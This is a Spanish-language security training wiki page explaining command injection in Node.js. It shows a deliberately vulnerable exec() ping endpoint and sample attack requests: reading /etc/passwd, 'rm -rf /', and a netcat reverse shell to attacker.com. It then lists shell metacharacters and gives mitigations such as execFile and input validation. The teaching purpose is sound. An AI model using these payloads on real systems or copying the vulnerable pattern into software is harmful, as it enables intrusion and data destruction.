Aitana Security Lab - Enterprise Security Training Platform
Filtros
Nivel / Rol
Categoría
Artículos (25)
HTTP: El Protocolo de la Web10 min
Estudiante
Cookies y Sesiones15 min
Estudiante
Autenticación y Autorización18 min
Estudiante
Arquitectura Cliente-Servidor15 min
Estudiante
APIs REST y Seguridad20 min
Estudiante
CORS y Same-Origin Policy16 min
Estudiante
SQL Injection (SQLi)20 min
Estudiante
Cross-Site Scripting (XSS)22 min
Estudiante
Cross-Site Request Forgery (CSRF)18 min
Estudiante
Insecure Direct Object References (IDOR)15 min
Estudiante
Broken Authentication19 min
Junior Developer
Command Injection20 min
Junior Developer
XML External Entity (XXE)25 min
Junior Developer
Server-Side Template Injection (SSTI)24 min
Junior Developer
Validación de Entrada15 min
Estudiante
Output Encoding14 min
Estudiante
Parameterized Queries16 min
Estudiante
Password Hashing17 min
Junior Developer
Content Security Policy (CSP)22 min
Junior Developer
Security Headers18 min
Junior Developer
Secure Session Management20 min
Junior Developer
Nikto15 min
Estudiante
OWASP ZAP22 min
Estudiante
Burp Suite25 min
Junior Developer
SQLMap20 min
Junior Developer
Wiki/Vulnerabilidades/Command Injection
Intermedio
CVSS 9.8 - Crítico
20 min

Command Injection

Ejecución de comandos del sistema operativo a través de input del usuario

¿Qué es Command Injection?

Ocurre cuando una aplicación ejecuta comandos del sistema usando input del usuario sin validación, permitiendo al atacante ejecutar comandos arbitrarios en el servidor.

Ejemplo Vulnerable

// Node.js - VULNERABLE
const { exec } = require('child_process');

app.get('/ping', (req, res) => {
  const ip = req.query.ip;
  // ❌ PELIGROSO: concatenar input del usuario
  exec(`ping -c 4 ${ip}`, (error, stdout) => {
    res.send(stdout);
  });
});

// Ataque:
// GET /ping?ip=8.8.8.8; cat /etc/passwd
// GET /ping?ip=8.8.8.8 && rm -rf /
// GET /ping?ip=8.8.8.8 | nc attacker.com 4444 -e /bin/bash

Caracteres de Inyección

; cmd      # Ejecutar cmd después
| cmd      # Pipe output a cmd
|| cmd     # OR lógico (ejecuta si falla el primero)
& cmd      # Ejecutar en background
&& cmd     # AND lógico
`cmd`     # Command substitution
$(cmd)    # Command substitution
> file    # Redirigir output
< file    # Redirigir input
%0a cmd   # Newline (URL encoded)

Mitigación

1. NO usar exec/system

// ✅ Usar librerías específicas en lugar de comandos shell
// Mal: exec('ping ' + ip)
// Bien: usar librería de ping

const ping = require('ping');
const result = await ping.promise.probe(ip, { timeout: 10 });

// Para operaciones de archivos, usar APIs de Node
const fs = require('fs/promises');
await fs.readFile(filename); // NO usar cat filename

2. Validación Estricta

// Si DEBES usar exec, validar input
const ipRegex = /^(\d{1,3}\.){3}\d{1,3}$/;

if (!ipRegex.test(ip)) {
  return res.status(400).json({ error: 'Invalid IP' });
}

// Whitelist de valores permitidos
const allowedCommands = ['start', 'stop', 'status'];
if (!allowedCommands.includes(command)) {
  return res.status(400).json({ error: 'Invalid command' });
}

3. Usar execFile con argumentos

const { execFile } = require('child_process');

// ✅ execFile NO invoca shell, pasa argumentos directamente
execFile('ping', ['-c', '4', ip], (error, stdout) => {
  if (error) {
    return res.status(500).json({ error: 'Ping failed' });
  }
  res.send(stdout);
});

// Los caracteres especiales se tratan como literales, no comandos

Siguiente

Server-Side Template Injection